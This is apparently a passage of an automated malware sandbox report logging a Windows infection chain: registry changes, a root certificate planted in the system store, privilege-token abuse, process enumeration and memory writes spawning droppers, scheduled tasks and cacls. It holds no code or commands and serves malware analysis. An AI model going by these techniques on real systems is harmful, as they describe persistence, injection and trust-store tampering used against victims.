Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1332 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1332 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1332 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1332 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1332 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1332 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1332 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1332 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1332 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1332 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1332 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 544 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 544 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 544 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 544 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1936 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1936 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1936 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1936 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1936 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1936 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1936 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1936 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1564 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1564 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
